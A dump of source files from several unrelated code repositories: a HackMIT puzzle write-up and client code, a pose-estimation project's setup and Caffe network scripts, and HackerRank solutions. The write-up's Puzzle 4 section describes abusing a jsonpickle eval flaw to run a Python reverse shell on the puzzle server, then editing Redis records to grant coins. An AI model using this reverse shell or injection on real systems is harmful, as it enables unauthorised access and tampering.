times\n\n```js\nfor (let i = 0; i < 5000; i++)\n\tcounter('loremipsum_000000', 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx')\n```\nOnce we reach 5000 cookies, we simply open the developer console and find our key.\n```\nYour secret key is: 0000000000000000000000000000000000000000000000000000000000000000\n```\n## Puzzle 2: Beavercoin TO the mooon 🚀 🚀 🚀\n\n\nThe idea behind this puzzle was to decrypt all the \"tweets\", each \"tweet\" had a positive or negative impact with respect to the market.\n\nThe decryption of the tweets was based on the following algorithms (All algorithms can be found in the repository respectively):\n- Hexadecimal\n- Bacon\n- Beaufort\n\nThe procedure we followed as a team was to open a Google Sheet and start noting in tables which tweets had positive and negative impact.\n\nAfter we had a considerable amount of tweets, we did the following:\n- If the tweet affected negatively, we sold everything.\n- If the tweet had a positive impact, we bought everything\n\nAfter doing that approximately 14 times, it gave you the money to be able to buy the key.\n\n## Puzzle 3: Double Agent on WSB\n\n\n## Puzzle 4: How to become a millionare in 12736 easy steps\nWell, the solution to this puzzle is totally different from what the creators of the puzzle expected. While solving the puzzle we realized that the ``jsonpickle`` library could be injected with Python code thanks to a vulnerability. 
\n\nThe vulnerability was that when the JSON was decoded it would decode into an ``.eval()``, allowing us to execute arbitrary code from the server.\n\nThe code we decided to run was a reverse shell (running directly in Python):\n```python\nCODE = \"\"\"\nimport socket, os, pty\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((SERVER_IP, 4242))\nos.dup2(s.fileno(), 0)\nos.dup2(s.fileno(), 1)\nos.dup2(s.fileno(), 2)\npty.spawn(\"\\\\x2f\" + \"bin\" + \"\\\\x2f\" + \"sh\")\n\"\"\".strip().replace(\"\\n\", \";\")\n```\n\nBefore executing the code shown we had to have a netcat listener in order to receive the connection.\n\nWe could have used the following code on any Linux computer\n```sh\nnc -lvp 4242\n```\nHaving access to the server, simply connect to the Redis server with the Telnet protocol\n```sh\ntelnet 127.0.0.1 6379\n```\n\nHaving access to the database, we select database 0 and ask for our user's data.\n```sh\nselect 0\nget loremipsum_000000\n```\nThis will give us a JSON. When we do that we will change the value of our user for the one modified by us, which will have the necessary coins to pass the puzzle.\n\n```sh\nset loremipsum_000000 'HERE YOU SHOULD PLACE YOUR MODIFIED JSON'\n```\nDoing this procedure the only thing left to do would be to go to your ``exchange.py`` and donate to get the key.\n\n## Puzzle 5: WE LOVE CHAD 🌙\n"
},
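A benign sketch of the `jsonpickle` behaviour the write-up above exploits: on vulnerable (older) jsonpickle versions, a `py/repr` tag of the form `module/expression` causes the module before the slash to be imported and the remainder to be passed to `eval()` during decode — the same mechanism `_solution.py` abuses with `os/exec(...)`. Whether this payload actually executes depends on the installed jsonpickle version; patched releases ignore or reject the tag.

```python
import jsonpickle

# "module/expression": the module before the slash is imported, the rest eval()'d.
payload = '{"py/repr": "math/math.sqrt(16)"}'
print(jsonpickle.decode(payload))  # prints 4.0 on vulnerable jsonpickle versions
```

This is why decoding attacker-controlled jsonpickle strings, as the puzzle server did, is equivalent to running attacker-supplied code.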
{
"alpha_fraction": 0.728436291217804,
"alphanum_fraction": 0.7470784783363342,
"avg_line_length": 23.4489803314209,
"blob_id": "89141e6cbb6370ed34cd6f3fb1a7135365fa3006",
"content_id": "db1708f000a3a32d38d96fe4c41a4b3448569073",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3594,
"license_type": "no_license",
"max_line_length": 273,
"num_lines": 147,
"path": "/puzzle4/modded_client/README.md",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "# HackBase Client Code\n\nThe document will outline the basic structure, setup and use of the HackBase client.\n\n## Setup\n\nThe client code is written in Python 3.9. Please make sure your python version is 3.5 and above.\n\nWe would recommend using a virtual environment. In the project directory:\n\n```\npip3 install virtualenv\nvirtualenv venv\nsource venv/bin/activate\n```\n\nGet dependencies,\n\n```\npip3 install -r requirements.txt\n```\n\n## Running\n\nFirst run the exchange client,\n\n```\npython3 exchange.py\n```\n\nThis should generate a new blockchain address and store it in `wallet.json`. Once you have the address, the client will reuse this file.\n\nThen in another terminal launch the miner,\n\n```\npython3 miner.py\n```\n\nThe miner also looks for the `wallet.json` file and will cry if you can't provide it. The miner runs in the background and mines blocks.\n\n## Exchange\n\nThe HackBase exchange provdies a variety of tools to transact your hackcoin. Here are the commands you can use\n\n## Constants\n\nThe `constants.py` file should already come set up with the correct values. If it isn't, set it up as follows:\n\n```python\nNODE_SERVER = \"<url of blockchain>/\"\n\nUSERNAME = \"<username>\"\n\nDIFFICULTY = 6\n\nREWARD = 10\n\nWALLET_FILE = \"wallet.json\"\n\nSTARTING_PRICE = 2\n\nPRINT_STR_LEN = 20\n```\n\nNote that the difficulty only applies to you as the client. The server can _cheat_ the difficulty and you'd be forced to accept those blocks as valid since you're trying to buy something from the store.\n\n#### Status\n\n```\nstatus\n```\n\nThis will check the status of a given address. If no address is provided, it will check your own status.\n\nThe status includes your account balance on the exchange (in dollars), the amount of Hackcoin you own, and the current market price of Hackcoin.\n\nYour hackcoin balance is computed with respect to the current valid and active chain.\n\n#### View Blockchain\n\n```\nbc\n```\n\nThis will print out the current blockchain in a table format. The information is the same displayed on our website visualizer\n\n### Who\n\n```\nwho\n```\n\nThis will print the other known hackcoin nodes on the network, along with their public address\n\n#### Transfer\n\n```\ntransfer <receiver> <amount>\n```\n\nThis will transfer `<amount>` hackcoin to the address provided in `<receiver>`. The transaction will appear once someone has mined a new block.\n\n#### Transactions\n\n```\ntxns\n```\n\nThis prints out the current pending transactions. Pending transactions are transactions that are waiting to be added to the blockchain once somebody mines a block.\n\n#### Buy Hackcoin\n\n```\nbuy <amount>\n```\n\nThis allows you to buy `<amount>` of hackcoin from the user named `vendor` at the market price. The transaction will be added to the blockchain on the next mined block\n\n#### Sell Hackcoin\n\n```\nsell <amount>\n```\n\nThis allows you to sell `<amount>` of hackcoin to the user named `vendor` at the market price. The vendor requires you to publish the transaction to transfer `<amount>` of hackcoin to the list of pending transactions so they can verify the payment before sending the money.\n\n#### Donate\n\n```\ndonate\n```\n\nThis allows you to donate to the Hackbase corporation. Donations are only made in amounts of $1,333,337\n\n## Tips\n\nThe puzzle resets every 2 hours :). Your solution should not require this much time to run\n\n<!-- ## Donate\n\nHackCoin is a valid cryptocurrency. 
If you're feeling generous and liked this puzzle, you can donate a few blockchains our way,\n\n```\ndf55754943142026092a8f5ecc768950ab09becd95a4f65cd7516618957b65b9\n```\n\n(Wait for us to announce the tracker to discover valid peers after the puzzle is over.) -->\n"
},
{
"alpha_fraction": 0.6660714149475098,
"alphanum_fraction": 0.6660714149475098,
"avg_line_length": 27,
"blob_id": "b51f99e846c89aea596188e5bbc9ff8f41d06d5f",
"content_id": "089f97b682f32f51e94adf4eb1d3d656755908d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 560,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 20,
"path": "/puzzle2/autodecipher.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "from json import load, dump\nfrom decipher.bacon import bacon\nfrom decipher.hex import hex \nfrom decipher.beaufort import beaufort\n\n# {[cipher, message], ...}\nciphered = load(open(\"ciphered.json\"))\n\ndeciphered = {}\nfor method, string in ciphered:\n if method == \"bacon\":\n deciphered[string] = bacon(string)\n elif method == \"hex\":\n deciphered[string] = hex(string)\n elif method == \"beaufort\":\n deciphered[string] = beaufort(string)\n else:\n raise Exception(\"You made a typo\")\n\ndump(deciphered, open(\"deciphered.json\", \"w\"))\n"
},
{
"alpha_fraction": 0.6730245351791382,
"alphanum_fraction": 0.6730245351791382,
"avg_line_length": 29.58333396911621,
"blob_id": "724bcd6a4e80c19f27e161348f0fb58b299af3cf",
"content_id": "146a7ddf02078e040d298c88611af1dadf15b2f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 367,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 12,
"path": "/puzzle2/generate_spreadsheet.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "from csv import writer\nfrom json import load\n\ndeciphered = load(open(\"deciphered.json\", \"r\"))\nspreadsheet = writer(open(\"spreadsheet.csv\", \"w\", newline=\"\"), delimiter=\",\")\n\nfor in_string, out_string in deciphered.items():\n print(in_string)\n print(out_string)\n effect = int(input(\">>> \"))\n spreadsheet.writerow([in_string, out_string, effect])\n print()\n"
},
{
"alpha_fraction": 0.43529412150382996,
"alphanum_fraction": 0.7960784435272217,
"avg_line_length": 18.615385055541992,
"blob_id": "b765f9a93c0ff264aa7b96bfacec75cb1aacdd8f",
"content_id": "9ff28541b534b26b90d733ff61773814ef1cf7a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 13,
"path": "/puzzle4/modded_client/constants.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "NODE_SERVER = \"https://hackcrypto.hackwsb.net\"\n\nUSERNAME = \"000alen_7cb3cb\"\n\nDIFFICULTY = 48246703848881748093154577086953264957717418763198680803381914548305920\n\nREWARD = 10000000\n\nWALLET_FILE = \"wallet.json\"\n\nSTARTING_PRICE = 200000\n\nPRINT_STR_LEN = 20\n"
}
] | 20 |
afcarl/poseInduction
|
https://github.com/afcarl/poseInduction
|
e1d9f917476f97ccca096e3b29a0c93b131ee6ac
|
d58a47002bc3276e4370d219ac9c768ebab060f1
|
26de515ee29b4547d6633ab722c160d9d338d4d7
|
refs/heads/master
| 2020-03-21T05:50:12.272398 | 2015-10-05T21:18:48 | 2015-10-05T21:18:48 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7163636088371277,
"alphanum_fraction": 0.7690908908843994,
"avg_line_length": 36.931034088134766,
"blob_id": "af5079e8d770bfee4b91575cdca57fa9de193030",
"content_id": "34db442d757c577120e29b2de0f3f0e694996d48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1100,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 29,
"path": "/initSetupTraining.sh",
"repo_name": "afcarl/poseInduction",
"src_encoding": "UTF-8",
"text": "#directory for data\nmkdir data\n\n# Download PASCAL 3D\nwget ftp://cs.stanford.edu/cs/cvgl/PASCAL3D+_release1.1.zip\nunzip PASCAL3D+_release1.1.zip\nmv PASCAL3D+_release1.1 PASCAL3D\nmv PASCAL3D+* data/\nmv PASCAL3D data/\n\n# move all imagenet images in PASCAL3D+ in one folder, to resemble the pascal VOC setup\nmkdir -p data/imagenet/images\nfor x in $(ls data/PASCAL3D/Images | grep imagenet); do mv data/PASCAL3D/Images/$x/*.JPEG data/imagenet/images/; done\n\n# Download keypoint annotations\nmkdir ./data/segkps\nwget -P ./data/segkps/ http://www.cs.berkeley.edu/~shubhtuls/cachedir/vpsKps/segkps.zip\nunzip ./data/segkps/segkps.zip -d ./data/segkps/\nwget -P ./data/ http://www.cs.berkeley.edu/~shubhtuls/cachedir/poseInduction/vocKpMetadata.mat\n# Download PASCAL VOC\nwget http://host.robots.ox.ac.uk:8080/pascal/VOC/voc2012/VOCtrainval_11-May-2012.tar\nwget http://host.robots.ox.ac.uk/pascal/VOC/voc2012/VOCdevkit_18-May-2011.tar\ntar -xf VOCtrainval_11-May-2012.tar\nmv VOCdevkit data/\nmv VOCtrainval_11-May-2012.tar data/\n\ntar -xf VOCdevkit_18-May-2011.tar\nmv VOCdevkit/* ./data/VOCdevkit/\nrm -rf VOCdevkit\n"
},
{
"alpha_fraction": 0.6229014992713928,
"alphanum_fraction": 0.6419443488121033,
"avg_line_length": 45.76953125,
"blob_id": "6291a3c3a3b2cedfb94291f68e4b800008890728",
"content_id": "0f20b3e3ceb92fb4dc42f5df5765cd22a89d4bdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11973,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 256,
"path": "/prototxts/poseNetConstruct.py",
"repo_name": "afcarl/poseInduction",
"src_encoding": "UTF-8",
"text": "import argparse, sys\nsys.path.append(\"../external/caffe/python\")\nfrom caffe import netSpec as NS\nfrom caffe.proto import caffe_pb2\nfrom collections import OrderedDict\nfrom caffe import netBuildUtils as nbUtils\nnumClasses = 21\nimport numpy as np\nimport os, errno\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else: raise\n\ndef poseNet(genMode, \\\n learn_fc = 1, learn_conv = 1, \\\n quat_loss = 0, softmax_loss = 1, vgg = 1, azimuth_net = 0, class_agnostic = 1, \\\n warp = 1, cpad = 16, flip = 1, batch_size = 20, crop_size = 224, \\\n window_file_folder = '/data1/shubhtuls/code/poseInduction/cachedir/rcnnFinetuneVps/binnedJoint/'):\n\n net = NS.NetSpec()\n if warp:\n crop_mode = \"warp\"\n else:\n crop_mode = \"square\"\n\n dataOut = ['data','label'] #output layers from data_layer\n poseOut = ['e1','e2','e3','e1c','e2c','e3c']\n dataOut = dataOut + poseOut\n if quat_loss:\n dataOut = dataOut + ['quat']\n\n if (genMode == 0):\n net.addInputBlobs(OrderedDict([\n ('data',[batch_size,3,crop_size,crop_size]),\n ('label',[batch_size, 1])\n ]))\n elif (genMode == 1):\n transform_param = dict(crop_size=crop_size, mirror=flip)\n window_data_param = dict(source=window_file_folder + 'Train.txt', batch_size = batch_size, context_pad = 16, crop_mode = crop_mode, fg_fraction = 1.0, fg_threshold = 0.5, bg_threshold = 0.5)\n net.addLayer('data', 'WindowPoseData', [], dataOut,\n transform_param = transform_param,\n window_data_param = window_data_param)\n elif (genMode == 2):\n transform_param = dict(crop_size=crop_size, mirror=flip)\n window_data_param = dict(source=window_file_folder + 'Val.txt', batch_size = batch_size, context_pad = 16, crop_mode = crop_mode, fg_fraction = 1.0, fg_threshold = 0.5, bg_threshold = 0.5)\n net.addLayer('data', 'WindowPoseData', [], dataOut,\n transform_param = transform_param,\n window_data_param = window_data_param)\n\n if(vgg):\n conv5_name = nbUtils.addVggTillConv(net, learn_conv, img_blob_name = 'data', suffix='')\n else:\n conv5_name = nbUtils.addAlexnetTillConv(net, learn_conv, img_blob_name = 'data', suffix='')\n\n top_name = nbUtils.addAlexnetFcLayers(net, learn_fc, inputBlobName = conv5_name, suffix='')\n fc7 = top_name\n\n if(quat_loss):\n if(class_agnostic):\n net.addLayer('quatMask', 'InnerProduct',fc7, 'quatMask',\n num_output = 4, weight_filler={'type':\"gaussian\",'std':0.01},\n bias_filler={'type':\"constant\", 'value':0})\n else:\n net.addLayer('quatPred', 'InnerProduct',fc7, 'quatPred',\n num_output = 4*numClasses, weight_filler={'type':\"gaussian\",'std':0.01},\n bias_filler={'type':\"constant\", 'value':0})\n net.addLayer('quatMask', 'MaskOutputs', ['quatPred','label'], 'quatMask', convolution_param = dict(kernel_size = 4))\n\n net.addLayer('quatNorm', 'QuatNormalization', 'quatMask', 'quatNorm')\n if(genMode > 0):\n net.addLayer('quatLoss', 'EuclideanAntipodalLoss', ['quatNorm','quat'], 'quatLoss')\n\n if(softmax_loss):\n if(not azimuth_net):\n poseLayerSizes = dict(e1 = 21, e2 = 21, e3 = 21, e1c = 7, e2c = 7, e3c = 7)\n else:\n poseLayerSizes = dict(e1 = 24, e2 = 16, e3 = 8, e1c = 4, e2c = 4, e3c = 4)\n\n for pl in poseOut:\n if(class_agnostic):\n kernel = poseLayerSizes[pl]\n net.addLayer(pl + 'Mask', 'InnerProduct',fc7, pl + 'Mask',\n num_output = kernel, weight_filler={'type':\"gaussian\",'std':0.01},\n bias_filler={'type':\"constant\", 'value':0})\n else:\n kernel = poseLayerSizes[pl]\n net.addLayer(pl + 'Pred', 
'InnerProduct',fc7, pl + 'Pred',\n num_output = kernel*numClasses, weight_filler={'type':\"gaussian\",'std':0.01},\n bias_filler={'type':\"constant\", 'value':0})\n net.addLayer(pl + 'Mask', 'MaskOutputs', [pl + 'Pred','label'], pl + 'Mask', convolution_param = dict(kernel_size = kernel))\n if(genMode > 0):\n net.addLayer(pl + 'Loss', 'SoftmaxWithLoss', [pl + 'Mask',pl], pl + 'Loss')\n if(genMode == 2):\n net.addLayer(pl + 'Accuracy', 'Accuracy', [pl + 'Mask',pl], pl + 'Accuracy')\n\n if(genMode == 0):\n net.addLayer('poseClassify','Concat',[pl + 'Mask' for pl in poseOut],'poseClassify')\n else:\n if(genMode > 0):\n net.addLayer('junkYardPose','Silence',poseOut,[])\n\n if(class_agnostic):\n net.addLayer('junkYardLabel','Silence','label' ,[])\n return net.toProto()\n\ndef constructNet(folder,\\\n\tfilename = 'train.prototxt', valfilename = 'test.prototxt', testfilename = 'deploy.prototxt', \\\n\tlearn_fc = 1, learn_conv = 1, \\\n\tquat_loss = 0, softmax_loss = 1, vgg = 1, azimuth_net = 0, class_agnostic = 1, \\\n\twarp = 1, cpad = 16, flip = 1, batch_size = 20, crop_size = 224, \\\n\twindow_file_folder = '/data1/shubhtuls/code/poseInduction/cachedir/rcnnFinetuneVps/binnedJoint/'):\n\n\t## trainNet\n\ttrainFile = folder + filename\n\twith open(trainFile, 'w') as f:\n\t\tnet = poseNet(1, \\\n\t\t\tlearn_fc = learn_fc, learn_conv = learn_conv, \\\n\t\t\tquat_loss = quat_loss, softmax_loss = softmax_loss, vgg = vgg, azimuth_net = azimuth_net, class_agnostic = class_agnostic, \\\n\t\t\twarp = warp, cpad = cpad, flip = flip, batch_size = batch_size, crop_size = crop_size, \\\n\t\t\twindow_file_folder = window_file_folder);\n\t\tprint >> f, net\n\n\tvalFile = folder + valfilename\n\twith open(valFile, 'w') as f:\n\t\tnet = poseNet(2, \\\n\t\t\tlearn_fc = learn_fc, learn_conv = learn_conv, \\\n\t\t\tquat_loss = quat_loss, softmax_loss = softmax_loss, vgg = vgg, azimuth_net = azimuth_net, class_agnostic = class_agnostic, \\\n\t\t\twarp = warp, cpad = cpad, flip = flip, batch_size = batch_size, crop_size = crop_size, \\\n\t\t\twindow_file_folder = window_file_folder);\n\t\tprint >> f, net\n\n\n\t## testNet\n\ttestFile = folder + testfilename\n\twith open(testFile, 'w') as f:\n\t\tnet = poseNet(0, \\\n\t\t\tlearn_fc = learn_fc, learn_conv = learn_conv, \\\n\t\t\tquat_loss = quat_loss, softmax_loss = softmax_loss, vgg = vgg, azimuth_net = azimuth_net, class_agnostic = class_agnostic, \\\n\t\t\twarp = warp, cpad = cpad, flip = flip, batch_size = batch_size, crop_size = crop_size, \\\n\t\t\twindow_file_folder = window_file_folder);\n\t\tprint >> f, net\n\ndef constructSolver(folder,\\\n\tfilename = 'train.prototxt', valfilename = 'test.prototxt',\n\tmax_iter = 70000, snapshot = 10000, test_iter = 100, test_interval = 1000, \\\n\tbase_lr = 0.001, lr_policy= \"step\", gamma = 0.1 ,stepsize = 20000 , momentum = 0.9 ,weight_decay = 0.0005, \\\n\tdisplay= 200, \\\n\tsnapshot_folder = '/work5/shubhtuls/snapshots/instancePose/', snapshot_subdir = '', snapshot_prefix = 'net'):\n\n\tmkdir_p(snapshot_folder + snapshot_subdir)\n\tprefix = snapshot_folder + snapshot_subdir + snapshot_prefix\n\tsolverFile = folder + 'solver.prototxt'\n\twith open(solverFile, 'w') as f:\n\t\tf.write(\"train_net : \\\"%s\\\"\\n\" %os.path.abspath(folder + filename) )\n\t\tf.write(\"test_net : \\\"%s\\\"\\n\" %os.path.abspath(folder + valfilename) )\n\t\tf.write(\"max_iter : %d\\n\" %max_iter)\n\t\tf.write(\"snapshot : %d\\n\" %snapshot)\n\t\tf.write(\"test_iter : %d\\n\" %test_iter)\n\t\tf.write(\"test_interval : %d\\n\" 
%test_interval)\n\t\tf.write(\"base_lr : %f\\n\" %base_lr)\n\t\tf.write(\"lr_policy : \\\"%s\\\"\\n\" %lr_policy)\n\t\tf.write(\"gamma : %f\\n\" %gamma)\n\t\tf.write(\"stepsize : %d\\n\" %stepsize)\n\t\tf.write(\"momentum : %f\\n\" %momentum)\n\t\tf.write(\"weight_decay : %f\\n\" %weight_decay)\n\t\tf.write(\"display : %d\\n\" %display)\n\t\tf.write(\"snapshot_prefix : \\\"%s\\\"\\n\" %prefix)\n\ndef parse_args():\n\t\"\"\"\n\tParse input arguments\n\t\"\"\"\n\tparser = argparse.ArgumentParser(description='Train a pose prediction network')\n\n\t## prototxt output parameters\n\tparser.add_argument('--folder', help='where to output the prototxt file',\n\t\tdefault=None, type=str)\n\tparser.add_argument('--filename', help='where to output the file',\n default=\"train.prototxt\", type=str)\n\tparser.add_argument('--valfilename', help='where to output the file',\n default=\"test.prototxt\", type=str)\n\tparser.add_argument('--testfilename', help='where to print test prototxt',\n default=\"deploy.prototxt\", type=str)\n\n\t## Learning parameters\n\tparser.add_argument('--learn_fc', default=1, type=float)\n\tparser.add_argument('--learn_conv', default=1, type=float)\n\n\t## Net Architecture\n\tparser.add_argument('--quat_loss', default=0, type=float)\n\tparser.add_argument('--softmax_loss', default=1, type=float)\n\tparser.add_argument('--vgg', default=1, type=float, help='whether to use VGG net or Alexnet')\n\tparser.add_argument('--azimuth_net', default = 0, type = float, help = 'whether to use joint or azimuth net')\n\tparser.add_argument('--class_agnostic', default = 1, type = float, help = 'whether to use same fc8 units across classes')\n\n\t## Input data parameters\n\tparser.add_argument('--warp', default=1, type=float, help='use warp or square crop')\n\tparser.add_argument('--cpad', default=16, type=float, help='input context paddding')\n\tparser.add_argument('--flip', default=1, type=float, help='whether to use VGG net or Alexnet')\n\tparser.add_argument('--batch_size', default=20, type=int, help='number of images in 1 minibatch')\n\tparser.add_argument('--crop_size', default=224, type=int, help='input size')\n\tparser.add_argument('--window_file_folder', default='/data1/shubhtuls/code/poseInduction/cachedir/rcnnFinetuneVps/binnedJoint/', type=str)\n\n\t## Solver parameters\n\tparser.add_argument('--max_iter', default=70000, type=int)\n\tparser.add_argument('--snapshot', default=10000, type=int)\n\tparser.add_argument('--test_iter', default=100, type=int)\n\tparser.add_argument('--test_interval', default=1000, type=int)\n\tparser.add_argument('--base_lr', default=0.001, type=float)\n\tparser.add_argument('--lr_policy', default='step')\n\tparser.add_argument('--gamma', default=0.1, type=float)\n\tparser.add_argument('--stepsize', default=20000, type=int)\n\tparser.add_argument('--momentum', default=0.9, type=float)\n\tparser.add_argument('--weight_decay', default=0.005, type=float)\n\tparser.add_argument('--display', default=200, type=int)\n\tparser.add_argument('--snapshot_folder', default='/data1/shubhtuls/code/poseInduction/cachedir/snapshots/')\n\tparser.add_argument('--snapshot_subdir', default='')\n\tparser.add_argument('--snapshot_prefix', default='net')\n\n\tif len(sys.argv) == 1:\n\t\tparser.print_help()\n\t\tsys.exit(1)\n\n\targs = parser.parse_args()\n\n\treturn args\n\nif __name__ == '__main__':\n\targs = parse_args()\n\n\tprint('Called with args:')\n\tprint(args)\n\tassert(args.folder != None), 'output folder not specified'\n\tassert(args.snapshot_subdir != ''), 'snapshot 
subdirectory not specified'\n\tmkdir_p(args.folder)\n\tconstructNet(args.folder,\n\t\tfilename = args.filename,\n\t\tvalfilename = args.valfilename,\n\t\ttestfilename = args.testfilename,\n\t\tlearn_fc = args.learn_fc, learn_conv = args.learn_conv,\n\t\tquat_loss = args.quat_loss, softmax_loss = args.softmax_loss, azimuth_net = args.azimuth_net, class_agnostic = args.class_agnostic,\n\t\tvgg = args.vgg,\n\t\twarp = args.warp, cpad = args.cpad,\n\t\tflip = args.flip, batch_size = args.batch_size, crop_size = args.crop_size,\n\t\twindow_file_folder = args.window_file_folder)\n\n\tconstructSolver(args.folder,\n\t\tfilename = args.filename, valfilename = args.valfilename,\n\t\tmax_iter = args.max_iter, snapshot = args.snapshot, test_iter = args.test_iter, test_interval = args.test_interval,\n\t\tbase_lr = args.base_lr, lr_policy= args.lr_policy, gamma = args.gamma ,stepsize = args.stepsize , momentum = args.momentum ,weight_decay = args.weight_decay,\n\t\tdisplay= args.display,\n\t\tsnapshot_folder = args.snapshot_folder, snapshot_subdir = args.snapshot_subdir, snapshot_prefix = args.snapshot_prefix)\n"
},
{
"alpha_fraction": 0.7485604882240295,
"alphanum_fraction": 0.7543185949325562,
"avg_line_length": 46.33333206176758,
"blob_id": "5baa97666b4d72d7f33747879cda89a7a6c8c9fb",
"content_id": "751b16b5e7d15af943eaacfc8a175dabb797550d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1563,
"license_type": "no_license",
"max_line_length": 300,
"num_lines": 33,
"path": "/README.md",
"repo_name": "afcarl/poseInduction",
"src_encoding": "UTF-8",
"text": "# Pose Induction.\n\n[Shubham Tulsiani](http://cs.berkeley.edu/~shubhtuls), [Joao Carreira](http://www.cs.berkeley.edu/~carreira/) and [Jitendra Malik](http://cs.berkeley.edu/~malik). Pose Induction for Novel Object Categories. In ICCV, 2015.\n\n### 0) Setup\n- Download the code\n```git clone --recursive https://github.com/shubhtuls/poseInduction```\n\n- We first need to download the required datasets (PASCAL VOC and PASCAL3D+) and additional annotations. In addition, we also need to reorganize some data. To do this automatically, run\n```bash initSetup.sh```\n\n- Edit the required paths in 'startup.m', specially if you've used a local copy of some data instead of downloading via initSetup.sh\n\n- Compile external/caffe (this is a slightly modified and outdated version of the [original](http://caffe.berkeleyvision.org/)). Sample compilation instructions are provided below. In case of any issues, refer to the installation instructions on the [caffe website](http://caffe.berkeleyvision.org/).\n\n```\ncd external/caffe\ncp Makefile.config.example Makefile.config\nmake -j 8\n#edit MATLAB_DIR in Makefile.config\nmake matcaffe pycaffe\ncd ../..\n```\n\n### 1) Demo\n- Initialize matlab in the root directory of the code.\n\n- Run\n``` startup; demo(); ```.\nthis will download our pretrained model and demonstrate predicted pose for a few images. Note that all the object classes in the demo images are novel (except for car which serves as a sanity check).\n\n### 2) Training Models and Reproducing Experiments\nThis part of the codebase is still under construction. We'll update the instructions shortly.\n\n"
}
] | 3 |
JevinD/HackerRank | https://github.com/JevinD/HackerRank | eadbf6e7e389deeb7f7a34761da69c2ada68aec8 | e0e9d8fd2b3ae6fc9deb184033ee853150568187 | f94d713676448c9c6103d08d9adde033d4724ada | refs/heads/master | 2021-07-23T00:05:28.423244 | 2020-06-24T17:49:45 | 2020-06-24T17:49:45 | 189,168,559 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5542168617248535,
"alphanum_fraction": 0.5614457726478577,
"avg_line_length": 18.761905670166016,
"blob_id": "3dad64823f3ad336dbae3dc0058b83c3317fc29c",
"content_id": "4a26451fddbccfac4f29a86ecbe533c8df964cd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 830,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 42,
"path": "/Repeated_String.py",
"repo_name": "JevinD/HackerRank",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the repeatedString function below.\ndef repeatedString(s, n):\n arr = []\n aInString = 0\n leftOverCount = 0\n timesRan = (int)(n/len(s))\n leftOver = n%len(s)\n arr=s[0:leftOver]\n #for every char in the s check count the a's\n for i in range(len(s)):\n if s[i] == 'a':\n aInString +=1\n \n #adds leftover count while checking for how many a's in reg count\n if i < len(arr) and s[i] =='a':\n leftOverCount +=1\n \n return timesRan*aInString + leftOverCount\n \n\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n n = int(input())\n\n result = repeatedString(s, n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n"
},
{
"alpha_fraction": 0.6712820529937744,
"alphanum_fraction": 0.6846153736114502,
"avg_line_length": 27.676469802856445,
"blob_id": "ff533e6b856ba8641399b86911ff4985ea04b649",
"content_id": "b238f160c57d1ff720bc350cd635718e5c123273",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1950,
"license_type": "no_license",
"max_line_length": 294,
"num_lines": 68,
"path": "/beautiful-days-at-the-movies.py",
"repo_name": "JevinD/HackerRank",
"src_encoding": "UTF-8",
"text": "'''\nProblem\nLily likes to play games with integers. She has created a new game where she determines the difference between a number and its reverse. For instance, given the number , its reverse is . Their difference is . The number reversed is , and their difference is .\nShe decides to apply her game to decision making. She will look at a numbered range of days and will only go to a movie on a beautiful day.\nGiven a range of numbered days, and a number , determine the number of days in the range that are beautiful. Beautiful numbers are defined as numbers where is evenly divisible by . If a day's value is a beautiful number, it is a beautiful day. Print the number of beautiful days in the range.\n\nFunction Description\nComplete the beautifulDays function in the editor below. It must return the number of beautiful days in the range.\nbeautifulDays has the following parameter(s):\n\ni: the starting day number\nj: the ending day number\nk: the divisor\n\nInput Format\nA single line of three space-separated integers describing the respective values of , , and .\n\nConstraints\n1<i<=j<=2*10**6\n1<=k<=2*10**9\n\nOutput Format\nPrint the number of beautiful days in the inclusive range between and .\n'''\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the beautifulDays function below.\ndef beautifulDays(i, j, k):\n count = 0\n for num in range(i,j+1):\n rev=reverseDigits(num)\n print((abs(num-rev)))\n if (abs(num-rev)%k)== 0:\n count+=1\n return count\n\n#reverses the Digits\ndef reverseDigits(num): \n rev = 0\n while(num > 0): \n a = num % 10\n rev = rev * 10 + a \n num = num // 10\n return rev\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n ijk = input().split()\n\n i = int(ijk[0])\n\n j = int(ijk[1])\n\n k = int(ijk[2])\n\n result = beautifulDays(i, j, k)\n\n fptr.write(str(result) + '\\n')\n\n 